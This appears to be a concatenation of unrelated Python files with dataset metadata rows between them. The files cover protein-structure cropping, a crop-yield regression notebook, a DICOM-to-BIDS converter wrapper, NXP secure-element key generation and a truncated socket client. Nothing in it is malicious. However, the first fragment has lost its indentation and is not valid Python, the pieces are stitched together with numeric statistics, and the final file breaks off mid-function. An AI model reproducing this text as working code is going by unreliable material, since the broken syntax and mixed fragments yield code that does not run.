args = parser.parse_args()
global logger
logger = ccl.crops_logger(level="info")
logger.info(ccl.welcome())
inseq=check_path(args.input_seqpath[0],'file')
indb=check_path(args.input_database[0],'file')
instr=check_path(args.input_strpath[0])
if args.uniprot_threshold is not None:
insprot=check_path(args.uniprot_threshold[1]) if args.uniprot_threshold != 'server-only' else 'server-only'
else:
insprot=None
minlen=float(args.uniprot_threshold[0]) if args.uniprot_threshold is not None else 0.0
targetlbl=ctg.target_format(indb,terms=args.terminals, th=minlen)
infixlbl=ctg.infix_gen(indb,terms=args.terminals)
if args.outdir is None:
outdir=check_path(os.path.dirname(inseq),'dir')
else:
outdir=check_path(os.path.join(args.outdir[0],''),'dir')
###########################################
logger.info('Parsing sequence file '+inseq)
seqset=cin.parseseqfile(inseq)
logger.info('Done')
logger.info('Parsing structure file '+instr)
strset, fileset=cin.parsestrfile(instr)
logger.info('Done')
logger.info('Parsing interval database file '+indb)
if len(seqset)>0:
intervals=cin.import_db(indb,pdb_in=seqset)
else:
raise ValueError('No chains were imported from sequence file.')
logger.info('Done\n')
if insprot is not None and minlen>0.0:
logger.info('Parsing uniprot sequence file '+insprot)
uniprotset={}
for seqncid, seqnc in seqset.items():
for monomerid, monomer in seqnc.imer.items():
if 'uniprot' in intervals[seqncid][monomerid].tags:
for key in intervals[seqncid][monomerid].tags['uniprot']:
if key.upper() not in uniprotset:
uniprotset[key.upper()]=None
uniprotset=cin.parseseqfile(insprot, uniprot=uniprotset)['uniprot']
logger.info('Done\n')
###########################################
gseqset={}
logger.info('Renumbering structure(s)...')
for key, structure in strset.items():
if key in seqset:
newstructure,gseqset[key]=cop.renumber_pdb(seqset[key],structure,seqback=True)
outstr=outpathgen(outdir,subdir=key,filename=key+infixlbl["renumber"]+os.path.splitext(instr)[1],mksubdir=True)
#newstructure.write_pdb(outstr)
newstructure.write_minimal_pdb(outstr)
logger.info('Done\n')
logger.info('Cropping renumbered structure(s)...')
outseq=os.path.join(outdir,os.path.splitext(os.path.basename(inseq))[0]+infixlbl["croprenum"]+os.path.splitext(os.path.basename(inseq))[1])
for key, S in gseqset.items():
newS=S.deepcopy()
if key in intervals:
if insprot is not None and minlen>0.0:
newinterval={}
for key2,monomer in S.imer.items():
if key2 in intervals[key]:
if insprot is not None and minlen>0.0:
newinterval[key2]=intervals[key][key2].deepcopy()
newinterval[key2].tags['description']+=' - Uniprot threshold'
newinterval[key2].subint=[]
unilbl=' uniprot chains included: '
for unicode,uniintervals in intervals[key][key2].tags['uniprot'].items():
if 100*uniintervals.n_elements()/uniprotset.imer[unicode].length()>=minlen:
newinterval[key2]=newinterval[key2].union(intervals[key][key2].intersection(uniintervals))
unilbl+=unicode +'|'
monomer=cop.crop_seq(monomer,newinterval[key2],targetlbl+unilbl,terms=args.terminals)
else:
monomer=cop.crop_seq(monomer,intervals[key][key2],targetlbl,terms=args.terminals)
newS.imer[key2]=monomer.deepcopy()
else:
logger.warning('Chain-name '+key+'_'+str(key2)+' not found in database. Cropping not performed.')
outseq=outpathgen(outdir,subdir=key,filename=key+infixlbl["croprenum"]+os.path.splitext(os.path.basename(inseq))[1])
monomer.dump(outseq)
if 'cropmap' in monomer.info:
outmap=outpathgen(outdir,subdir=key,filename=key+infixlbl["croprenum"]+'.cropmap')
monomer.dumpmap(outmap)
if insprot is not None and minlen>0.0:
cropped_str=cop.crop_pdb(strset[key],newS,original_id=True)
else:
cropped_str=cop.crop_pdb(strset[key],newS,original_id=True)
outstr=outpathgen(outdir,subdir=key,filename=key+infixlbl["crop"]+os.path.splitext(instr)[1],mksubdir=True)
#cropped_str.write_pdb(outstr)
cropped_str.write_minimal_pdb(outstr)
if insprot is not None and minlen>0.0:
cropped_str2=cop.crop_pdb(strset[key],newS,original_id=False)
else:
cropped_str2=cop.crop_pdb(strset[key],newS,original_id=False)
outstr=outpathgen(outdir,subdir=key,filename=key+infixlbl["croprenum"]+os.path.splitext(instr)[1],mksubdir=True)
#cropped_str2.write_pdb(outstr)
cropped_str2.write_minimal_pdb(outstr)
else:
logger.warning('PDB-ID '+key.upper()+' not found in database. Cropping not performed.')
for key2,monomer in newS.imer.items():
outseq=outpathgen(outdir,subdir=key,filename=key+os.path.splitext(os.path.basename(inseq))[1])
monomer.dump(outseq)
logger.info('Done\n')
return
if __name__ == "__main__":
import sys
import traceback
try:
main()
logger.info(ccl.ok())
sys.exit(0)
except Exception as e:
if not isinstance(e, SystemExit):
msg = "".join(traceback.format_exception(*sys.exc_info()))
logger.critical(msg)
sys.exit(1)
| 47.862069
| 289
| 0.635687
| 1,006
| 8,328
| 5.127237
| 0.241551
| 0.027142
| 0.012214
| 0.029081
| 0.257076
| 0.227608
| 0.215587
| 0.178945
| 0.142691
| 0.116906
| 0
| 0.009274
| 0.236071
| 8,328
| 173
| 290
| 48.138728
| 0.801478
| 0.035303
| 0
| 0.179856
| 0
| 0.014388
| 0.17257
| 0.007815
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014388
| false
| 0
| 0.093525
| 0
| 0.122302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
90251fea4bf1c0681bcedcffe3e8a599e9d53e72
| 13,189
|
py
|
Python
|
DSDM_Assignment2_final.py
|
antonyjames1996/time-series-analysis-agrotech
|
1e2abfe07f0e82c7a6f5cc01a268826fb2d29635
|
[
"MIT"
] | null | null | null |
DSDM_Assignment2_final.py
|
antonyjames1996/time-series-analysis-agrotech
|
1e2abfe07f0e82c7a6f5cc01a268826fb2d29635
|
[
"MIT"
] | null | null | null |
DSDM_Assignment2_final.py
|
antonyjames1996/time-series-analysis-agrotech
|
1e2abfe07f0e82c7a6f5cc01a268826fb2d29635
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[95]:
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
# get_ipython().run_line_magic('matplotlib', 'inline')
from sklearn.neighbors import LocalOutlierFactor
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.ensemble import RandomForestRegressor
from sklearn.multioutput import MultiOutputRegressor
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble import StackingRegressor
from sklearn.svm import LinearSVR
from sklearn.metrics import r2_score
from sklearn.ensemble import StackingRegressor
from sklearn.feature_selection import RFECV
# from xgboost.sklearn import XGBClassifier
data = pd.ExcelFile('Data.xlsx')
plants = pd.read_excel(data, 'plants')
flight = pd.read_excel(data, 'flight dates')
planting = pd.read_excel(data, 'planting')
weather = pd.read_excel(data, 'weather')
# In[2]:
# Renaming the plants data columns
plants = plants.rename(columns = {'Batch Number': 'batch_number', 'Plant Date': 'plant_date', 'Class': 'class',
'Fresh Weight (g)': 'fresh_weight', 'Head Weight (g)': 'head_weight',
'Radial Diameter (mm)': 'radial_diameter', 'Polar Diameter (mm)': 'polar_diameter',
'Diameter Ratio': 'diameter_ratio', 'Leaves': 'leaves', 'Density (kg/L)': 'density',
'Leaf Area (cm^2)': 'leaf_area', 'Square ID': 'square_id',
'Check Date': 'check_date', 'Flight Date': 'flight_date', 'Remove': 'remove'})
plants.describe()
# In[3]:
# Dropping the wrong garbage data after row 1822
planting = planting.iloc[0:1821, :]
planting = planting.drop(columns = ['Column2', 'Column3', 'Column1', 'Column4'])
planting
# In[4]:
# Removing all the non-null values from the 'Remove column'
plants = plants[plants['remove'].isnull()]
# Dropping the remove column from the dataset
plants = plants.drop(columns = ['remove'])
# Dropping the leaves column
plants = plants.drop(columns = ['leaves'])
# In[5]:
# the number of NaN values in the plants plant_date
plants['plant_date'].isna().sum()
# In[6]:
# rename the flights data columns
flight = flight.rename(columns = {'Batch Number': 'batch_number', 'Flight Date': 'flight_date'})
# In[7]:
# Merging the plants and flight data on 'batch_number'
df_merge = pd.merge(plants, flight, how = 'left', on = 'batch_number')
dd1 = df_merge.loc[: , df_merge.columns != 'flight_date_x']
dd2 = df_merge.drop('flight_date_y', axis = 1)
dd1 = dd1.rename(columns = {'flight_date_y': 'flight_date'})
dd2 = dd2.rename(columns = {'flight_date_x': 'flight_date'})
dd1.update(dd2)
df_merge = dd1
# In[8]:
### Dropping the NaN values of the flight_date, head_weight, radial_diameter, polar_diameter
plant = df_merge.dropna(subset = ['flight_date', 'head_weight', 'radial_diameter', 'polar_diameter'])
# In[9]:
plant = plant.copy()
# In[10]:
plant
# In[11]:
### dropping the rows with Null values in plant_date
plant.dropna(subset = ['plant_date'], inplace = True)
# In[12]:
### Making a new variable 'flight_time' which tells the number of days from the 'plant_date'
plant['flight_time'] = plant['flight_date'] - plant['plant_date']
plant['flight_time'] = plant['flight_time'].astype('timedelta64[D]')
# In[13]:
plant['check_time'] = plant['check_date'] - plant['plant_date']
plant['check_time'] = plant['check_time'].astype('timedelta64[D]')
# In[14]:
plant['check_flight_time'] = plant['check_date'] - plant['flight_date']
plant['check_flight_time'] = plant['check_flight_time'].astype('timedelta64[D]')
# In[15]:
### dropping all the Null values in the plants
plant.dropna(inplace=True)
# In[16]:
### changing the plant-date and check-date to date time format
plant['plant_date']= pd.to_datetime(plant['plant_date'])
plant['check_date']= pd.to_datetime(plant['check_date'])
# In[17]:
### renaming the columns of the weather data
weather = weather.rename(columns = {'Unnamed: 0': 'weather_date', 'Solar Radiation [avg]': 'solar_radiation',
'Precipitation [sum]': 'precipitation', 'Wind Speed [avg]': 'wind_speed_avg',
'Wind Speed [max]': 'wind_speed_max', 'Battery Voltage [last]': 'battery_voltage',
'Leaf Wetness [time]': 'leaf_wetness', 'Air Temperature [avg]': 'air_temp_avg',
'Air Temperature [max]': 'air_temp_max', 'Air Temperature [min]': 'air_temp_min',
'Relative Humidity [avg]': 'relative_humidity', 'Dew Point [avg]': 'dew_point_avg',
'Dew Point [min]': 'dew_point_min', 'ET0 [result]': 'eto_result'})
# In[18]:
### dropping the duplpicates in the weather dataset
weather = weather.drop_duplicates(subset = ['weather_date'])
# In[19]:
### changing the weather-date to date time format
weather['weather_date']= pd.to_datetime(weather['weather_date'])
# In[20]:
for x,(i, j) in enumerate(zip(plant.plant_date, plant.check_date)):
df_subset = weather[(weather['weather_date']>i) & (weather['weather_date']< j)]
plant.at[x, 'avg_precipitation'] = (df_subset['precipitation'].mean())
plant.at[x, 'std_precipitation'] = (df_subset['precipitation'].std())
plant.at[x, 'avg_solar_rad'] = df_subset['solar_radiation'].mean()
plant.at[x, 'std_solar_rad'] = df_subset['solar_radiation'].std()
plant.at[x, 'avg_wind_speed'] = df_subset['wind_speed_avg'].mean()
plant.at[x, 'std_wind_speed'] = df_subset['wind_speed_avg'].std()
plant.at[x, 'avg_air_temp'] = df_subset['air_temp_avg'].mean()
plant.at[x, 'std_air_temp'] = df_subset['air_temp_avg'].std()
plant.at[x, 'avg_leaf_wetness'] = df_subset['leaf_wetness'].mean()
plant.at[x, 'std_leaf_wetness'] = df_subset['leaf_wetness'].std()
plant.at[x, 'avg_relative_humidity'] = df_subset['relative_humidity'].mean()
plant.at[x, 'std_relative_humidity'] = df_subset['relative_humidity'].std()
plant.at[x, 'avg_dew_point'] = df_subset['dew_point_avg'].mean()
plant.at[x, 'std_dew_point'] = df_subset['dew_point_avg'].std()
# In[21]:
### dropping the rows with Null values again if any
plant = plant.dropna()
# In[22]:
plant = plant[['plant_date', 'flight_date', 'check_date','batch_number', 'class', 'density',
'leaf_area','square_id',
'flight_time', 'check_time', 'check_flight_time',
'avg_precipitation', 'std_precipitation', 'avg_solar_rad', 'std_solar_rad',
'avg_wind_speed','std_wind_speed', 'avg_air_temp', 'std_air_temp',
'avg_leaf_wetness', 'std_leaf_wetness', 'avg_relative_humidity','std_relative_humidity',
'avg_dew_point','std_dew_point' ,'fresh_weight', 'diameter_ratio',
'head_weight', 'radial_diameter', 'polar_diameter']]
# In[23]:
plant
# In[97]:
### Exploratory Data Analysis
### Plant data analysis
plant_data = plant[['batch_number', 'class',
'density', 'leaf_area','square_id', 'flight_time', 'check_time' ,'fresh_weight',
'diameter_ratio', 'head_weight', 'radial_diameter', 'polar_diameter']]
plant_data.hist(figsize = (16,10))
# plt.savefig("plant_hist.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[98]:
### plant_data heatmap
fig = plt.figure(figsize = (10,10))
sns.heatmap(plant_data.corr(), vmax = 0.6, square = True)
# plt.savefig("plant_heatmap.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[106]:
sns.jointplot(x = "radial_diameter",y = "polar_diameter", data=plant, hue="class");
# plt.savefig("radial_polar.pdf", format="pdf", bbox_inches="tight")
# plt.suptitle("Joint plot between Fresh Weight and Head Weight", y = 0)
# plt.show()
# In[107]:
sns.jointplot(x = "fresh_weight", y = "head_weight", data=plant
, hue="class");
plt.suptitle("Joint plot between Fresh Weight and Head Weight", y = 0)
# plt.savefig("fresh_weight_head_weight.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[108]:
sns.scatterplot(data = plant, x="check_time", y="density", hue="class")
plt.title('Scatterplot between check_time - density',loc='center' ,y=-0.3)
plt.xlabel('check_time')
plt.ylabel('density')
# plt.savefig("check_time_density.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[109]:
sns.pairplot(plant[['batch_number', 'class', 'flight_time' ,
'head_weight', 'radial_diameter', 'polar_diameter']])
# plt.savefig("plant_pairplot.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[110]:
### weather data analysis
weather.hist(figsize = (16,10))
# plt.savefig("weather_histplot.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[111]:
fig = plt.figure(figsize = (10,10))
sns.heatmap(weather.corr(), vmax = .8, square = True)
# plt.savefig("weather_heatmap.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[37]:
X = plant.iloc[:, 3:-5]
y = plant.iloc[:, -3:]
# In[43]:
X = X.to_numpy()
y = y.to_numpy()
# In[45]:
### detection of Outliers
outliers = LocalOutlierFactor()
out = outliers.fit_predict(X)
# masking out by selecting all rows that are not outliers
mask = out != -1
X, y = X[mask, :], y[mask]
print(X.shape, y.shape)
# In[47]:
# Split the data into train, test split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)
# In[127]:
X_plant = plant.iloc[:, 3:11]
y_plant = plant.iloc[:, -3:]
X_weather = plant.iloc[:, 11:25]
y_weather = plant.iloc[:, -3:]
# In[128]:
X_plant_train, X_plant_test, y_plant_train, y_plant_test = train_test_split(X_plant, y_plant, test_size=0.33,
random_state=42)
X_weather_train, X_weather_test, y_weather_train, y_weather_test = train_test_split(X_weather, y_weather,
test_size=0.33, random_state=42)
# In[132]:
# Model 1 : Linear Regression
model = LinearRegression()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print('Linear Regression model score:' ,r2_score(y_test, y_pred, multioutput='variance_weighted'))
# In[129]:
# Model 1.1 : Linear Regression using just plants data
model = LinearRegression()
model.fit(X_plant_train, y_plant_train)
y_pred = model.predict(X_plant_test)
print('Linear Regression model score with plants:' ,r2_score(y_plant_test, y_pred, multioutput='variance_weighted'))
# In[130]:
# Model 1.2 : Linear Regression using just weather data
model = LinearRegression()
model.fit(X_weather_train, y_weather_train)
y_pred = model.predict(X_weather_test)
print('Linear Regression model score with weather:' ,r2_score(y_weather_test, y_pred, multioutput='variance_weighted'))
# In[135]:
# Model 2 : Random Forest
model = RandomForestRegressor()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
print('Random Forest model score:' ,r2_score(y_test, y_pred, multioutput='variance_weighted'))
# In[137]:
feat_importances = pd.Series(model.feature_importances_, index=plant.iloc[:, 3:-5].columns)
feat_importances.nlargest(10).plot(kind='barh')
# plt.savefig("feature_imp_all.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[138]:
# Model 2.1 : Random Forest using just plant data
model = RandomForestRegressor()
model.fit(X_plant_train, y_plant_train)
y_pred = model.predict(X_plant_test)
print('Random Forest model score with plants:' ,r2_score(y_plant_test, y_pred, multioutput='variance_weighted'))
# In[140]:
feat_importances = pd.Series(model.feature_importances_, index=plant.iloc[:, 3:11].columns)
feat_importances.nlargest(10).plot(kind='barh')
# plt.savefig("feature_imp_plant.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[141]:
# Model 2.2 : Random Forest using just weather data
model = RandomForestRegressor()
model.fit(X_weather_train, y_weather_train)
y_pred = model.predict(X_weather_test)
print('Random Forest model score with weather:' ,r2_score(y_weather_test, y_pred, multioutput='variance_weighted'))
# In[142]:
feat_importances = pd.Series(model.feature_importances_, index=plant.iloc[:, 11:25].columns)
feat_importances.nlargest(10).plot(kind='barh')
# plt.savefig("feature_imp_weather.pdf", format="pdf", bbox_inches="tight")
# plt.show()
# In[94]:
# list(plant.iloc[:, 3:-5].columns.values)
# In[ ]:
# In[93]:
# # Model 2 : Random Forest
# model = RandomForestRegressor()
# model.fit(X_train, y_train)
# y_pred = model.predict(X_test)
# print('model score:' ,r2_score(y_test, y_pred, multioutput='variance_weighted'))
# In[ ]:
# 'batch_number' ,'density' , 'leaf_area' , 'check_time', 'std_precipitation', 'avg_solar_rad',
# 'std_solar_rad', 'std_air_temp', 'avg_relative_humidity', 'std_relative_humidity', 'avg_dew_point',
# 'std_dew_point'
# In[91]:
# Model 3 : Gradient Boosting
reg = MultiOutputRegressor(GradientBoostingRegressor())
reg.fit(X_train, y_train)
print('Gradient Boosting score', reg.score(X_test, y_test))
# In[ ]:
| 26.116832
| 119
| 0.679506
| 1,840
| 13,189
| 4.645652
| 0.167391
| 0.012635
| 0.013102
| 0.02059
| 0.502223
| 0.433786
| 0.340664
| 0.286968
| 0.253276
| 0.219584
| 0
| 0.02066
| 0.163242
| 13,189
| 504
| 120
| 26.168651
| 0.753896
| 0.251801
| 0
| 0.16875
| 0
| 0
| 0.300638
| 0.008646
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.13125
| 0
| 0.13125
| 0.05
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9025967f892fe7e0100f3ff33e467fab11a11531
| 4,830
|
py
|
Python
|
dcm2niix.py
|
rhancockn/dcm2bids
|
16597eeb20edfa0ec707c9bd0bf8468d94e0c925
|
[
"MIT"
] | null | null | null |
dcm2niix.py
|
rhancockn/dcm2bids
|
16597eeb20edfa0ec707c9bd0bf8468d94e0c925
|
[
"MIT"
] | null | null | null |
dcm2niix.py
|
rhancockn/dcm2bids
|
16597eeb20edfa0ec707c9bd0bf8468d94e0c925
|
[
"MIT"
] | null | null | null |
#!/use/bin/python
import tempfile
import os
import dicom
import pandas
import json
import numpy as np
from os.path import join
import glob
import errno
import shutil
class dcm2niix(object):
"""A wrapper for the dcm2niix command
"""
def __init__(self, row, bids_dir, intent = None):
self.intent = intent
#Dicom keys of interest
self.keys=['RepetitionTime', 'AcquisitionMatrix', 'EchoTime', 'EchoTrainLength','FlipAngle', 'Manufacturer', 'ManufacturerModelName', 'MagneticFieldStrength', 'DeviceSerialNumber', 'SoftwareVersions', 'InversionTime', 'PixelBandwidth', 'ScanOptions', 'InPlanePhaseEncodingDirection']
self.wd = os.getcwd()
self.row = row
self.bids_basename = join(bids_dir, 'sub-' + row.PatientID, row.target_path)
files = glob.glob(join(row.DICOMPath, 'IM-*-0001.dcm'))
self.dcm = dicom.read_file(files[0])
#def __del__(self):
# os.rmdir(self.tempdir)
def _make_dicom_json(self):
self.json_dict = {}
keys = np.intersect1d(self.keys,self.dcm.dir())
for k in keys:
self.json_dict[k] = self.dcm.get(k)
if self.dcm.has_key((0x19,0x1028)):
self.json_dict['EffectiveEchoSpacing'] = 1.0/(self.dcm[0x19,0x1028].value*self.dcm.AcquisitionMatrix[0])
self.json_dict['TotalReadoutTime'] = 1.0/self.dcm[0x19,0x1028].value
if self.dcm.has_key((0x19,0x1029)):
self.json_dict['SliceTiming'] = self.dcm[0x19,0x1029].value
self.json_dict['PulseSequenceDetails'] = self.dcm[0x18,0x24].value
if self.dcm.has_key((0x20,0x4000)):
self.json_dict['PulseSequenceDetails'] = self.json_dict['PulseSequenceDetails'] + ' ' + self.dcm[0x20,0x4000].value
if self.dcm.has_key((0x51,0x100f)):
self.json_dict['ReceiveCoilName'] = self.dcm[0x51,0x100f].value
self.json_dict['TaskName'] = self.row.task
self.json_dict['PhaseEncodingDirectionPositive'] = self.row.PhaseEncodingDirectionPositive
#add the list of intent scans, if any.
if self.intent:
self.json_dict['IntendedFor'] = self.intent
def _convert(self):
self.tempdir = tempfile.mkdtemp()
cmd = 'dcm2niix -b y -o . -z y -x n -f out "%s"' % self.row.DICOMPath
os.chdir(self.tempdir)
err = os.system(cmd)
if err != 0:
raise Exception('Error converting DICOM %s' % self.row.DICOMPath)
os.chdir(self.wd)
def _copy(self):
bids_dir = os.path.dirname(self.bids_basename)
self._mkdir_p(bids_dir)
#the magnitudes from both echoes are in the same directory
#dcm2niix splits the echoes. Copy them appropriately
if self.row.type == 'magnitude':
if os.path.isfile(join(self.tempdir,'out.nii.gz')):
shutil.copyfile(join(self.tempdir,'out.nii.gz'), self.bids_basename + '1.nii.gz')
if os.path.isfile(join(self.tempdir,'_e2out.nii.gz')):
shutil.copyfile(join(self.tempdir,'_e2out.nii.gz'), self.bids_basename + '2.nii.gz')
if os.path.isfile(join(self.tempdir,'out.bids')):
json_fname = self.bids_basename + '1.json'
shutil.copyfile(join(self.tempdir,'out.bids'), json_fname)
self._update_json(json_fname)
json_fname = self.bids_basename + '2.json'
shutil.copyfile(join(self.tempdir,'_e2out.bids'), json_fname)
self._update_json(json_fname)
elif self.row.type in ['phasediff', 'magnitude2']:
shutil.copyfile(glob.glob(join(self.tempdir,'*out.nii.gz'))[0], self.bids_basename + '.nii.gz')
json_fname = self.bids_basename + '.json'
shutil.copyfile(glob.glob(join(self.tempdir,'*out.bids'))[0], json_fname)
self._update_json(json_fname)
#anything but a single magnitude directory should produce one out.nii.gz/out.bids pair
else:
imgs = glob.glob(join(self.tempdir, '*out*.nii.gz'))
if len(imgs) > 1:
raise Exception('More out.nii.gz files than expected')
shutil.copyfile(join(self.tempdir,'out.nii.gz'), self.bids_basename + '.nii.gz')
json_fname = self.bids_basename + '.json'
shutil.copyfile(join(self.tempdir,'out.bids'), json_fname)
self._update_json(json_fname)
if self.row.type == 'dwi':
shutil.copyfile(join(self.tempdir,'out.bval'), self.bids_basename + '.bval')
shutil.copyfile(join(self.tempdir,'out.bvec'), self.bids_basename + '.bvec')
def _update_json(self, fname):
fp=open(fname, 'r+')
meta = json.load(fp)
orig_keys = np.intersect1d(self.json_dict.keys(), meta.keys())
for k in np.setdiff1d(self.json_dict.keys(),meta.keys()):
meta[k]=self.json_dict[k]
for k in orig_keys:
meta['o'+k] = self.json_dict[k]
fp.seek(0)
json.dump(meta,fp,indent=2)
fp.close()
def _mkdir_p(self,path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def process(self):
self._make_dicom_json()
self._convert()
self._copy()
os.system('chmod 2550 %s*' % self.bids_basename)
shutil.rmtree(self.tempdir)
| 32.2
| 285
| 0.695238
| 702
| 4,830
| 4.65812
| 0.264957
| 0.06055
| 0.058716
| 0.06055
| 0.37156
| 0.33578
| 0.237615
| 0.184098
| 0.125994
| 0.105199
| 0
| 0.027014
| 0.149275
| 4,830
| 149
| 286
| 32.416107
| 0.7688
| 0.073292
| 0
| 0.098039
| 0
| 0
| 0.169279
| 0.022615
| 0
| 0
| 0.021944
| 0
| 0
| 1
| 0.068627
| false
| 0.009804
| 0.098039
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
902da8cbd33808618399125bb013b3cfef957b80
| 4,479
|
py
|
Python
|
src/sss/genkey.py
|
foundriesio/plug-and-trust-ssscli
|
f77c65d5b3de649d7db1c023ee41d871f77cd224
|
[
"Apache-2.0"
] | null | null | null |
src/sss/genkey.py
|
foundriesio/plug-and-trust-ssscli
|
f77c65d5b3de649d7db1c023ee41d871f77cd224
|
[
"Apache-2.0"
] | null | null | null |
src/sss/genkey.py
|
foundriesio/plug-and-trust-ssscli
|
f77c65d5b3de649d7db1c023ee41d871f77cd224
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2018-2020 NXP
# SPDX-License-Identifier: Apache-2.0
#
#
"""License text"""
import logging
from . import sss_api as apis
from .keystore import KeyStore
from .keyobject import KeyObject
from .getkey import Get
from .util import get_ecc_cypher_type
log = logging.getLogger(__name__)
class Generate:
"""
Generate key pair/public key of ecc/rsa
"""
def __init__(self, session_obj):
"""
Constructor
:param session_obj: Instance of session
"""
self._session = session_obj
self._ctx_ks = KeyStore(self._session)
self._ctx_key = KeyObject(self._ctx_ks)
self.key_obj_mode = apis.kKeyObject_Mode_Persistent
def gen_ecc_public(self, key_id, curve_type, file_name, policy, encode_format=""): # pylint: disable=too-many-arguments
"""
Generate ecc public key
:param key_id: Key index
:param curve_type: ECC curve type
:param file_name: File name to store public key
:param policy: Policy to be applied
:param encode_format: File format to store public key
:return: Status
"""
if file_name[-4:] != '.pem' and file_name[-4:] != '.der':
log.error("Unsupported file type. File type should be in pem or der format")
return apis.kStatus_SSS_Fail
status = self.gen_ecc_pair(key_id, curve_type, policy)
if status != apis.kStatus_SSS_Success:
return status
get = Get(self._session)
status = get.get_key(key_id, file_name, encode_format)
return status
def gen_ecc_pair(self, key_id, curve_type, policy):
"""
Generate ecc key pair
:param key_id: Key index
:param curve_type: ECC curve type
:param policy: Policy to be applied
:return: Status
"""
cypher_type, key_size = get_ecc_cypher_type(curve_type)
key_type = apis.kSSS_KeyPart_Pair
if key_size == 0:
log.error("curve type not supported")
return apis.kStatus_SSS_Fail
status = self._gen_key_pair(key_id, key_size, key_type, cypher_type, policy)
return status
def gen_rsa_public(self, key_id, key_size, file_name, policy):
"""
Generate rsa public key
:param key_id: Key index
:param key_size: Key size to generate
:param file_name: File name to store public key
:param policy: Policy to be applied
:return: Status
"""
if file_name[-4:] != '.pem' and file_name[-4:] != '.der':
log.error("Unsupported file type. File type should be in pem or der format")
return apis.kStatus_SSS_Fail
status = self.gen_rsa_pair(key_id, key_size, policy)
if status != apis.kStatus_SSS_Success:
return status
get = Get(self._session)
status = get.get_key(key_id, file_name)
return status
def gen_rsa_pair(self, key_id, key_size, policy):
"""
Generate rsa key pair
:param key_id: Key index
:param key_size: RSA key size to generate
:param policy: Policy to be applied
:return: Status
"""
key_type = apis.kSSS_KeyPart_Pair
cypher_type = apis.kSSS_CipherType_RSA_CRT
status = self._gen_key_pair(key_id, key_size, key_type, cypher_type, policy)
return status
def _gen_key_pair(self, key_id, key_size, key_type, cypher_type, policy): # pylint: disable=too-many-arguments
"""
Generate key pair
:param key_id: Key index
:param key_size: Key size
:param key_type: Key type
:param cypher_type: Cypher type
:param policy: Policy to be applied
:return: Status
"""
# Key length calculation based on key bit length
# if modulus of key_bit_len is non zero, then allocate extra byte
if (key_size % 8) != 0:
key_len = (key_size / 8) + 1
else:
key_len = key_size / 8
status = self._ctx_key.allocate_handle(key_id, key_type, cypher_type, int(key_len),
self.key_obj_mode)
if status != apis.kStatus_SSS_Success:
return status
status = self._ctx_ks.generate_key(self._ctx_key, key_size, policy)
if status != apis.kStatus_SSS_Success:
return status
status = self._ctx_ks.save_key_store()
return status
| 33.177778
| 124
| 0.621121
| 607
| 4,479
| 4.319605
| 0.177924
| 0.048055
| 0.036613
| 0.02746
| 0.611365
| 0.548055
| 0.490465
| 0.490465
| 0.471777
| 0.410755
| 0
| 0.006353
| 0.297165
| 4,479
| 134
| 125
| 33.425373
| 0.826557
| 0.273052
| 0
| 0.433333
| 0
| 0
| 0.057619
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
902e9315b6728c26e93d095508b7d9dca413b5b0
| 979
|
py
|
Python
|
Python/uds/uds_client.py
|
kaehsu/template-bash
|
f8a8a4babb8537622a4e4246701761a9832d6aeb
|
[
"MIT"
] | null | null | null |
Python/uds/uds_client.py
|
kaehsu/template-bash
|
f8a8a4babb8537622a4e4246701761a9832d6aeb
|
[
"MIT"
] | null | null | null |
Python/uds/uds_client.py
|
kaehsu/template-bash
|
f8a8a4babb8537622a4e4246701761a9832d6aeb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#
# To communicate with UDS server by nc: "echo -e "string\c" | sudo nc -q 1 -U /var/run/uds_led"
import socket
serverAddress = '/tmp/portex_tmp'
def main():
try:
while True:
message = input(
'Enter the message send to server ("Quit" to quit): ')
if message:
if message == 'Quit':
raise SystemExit
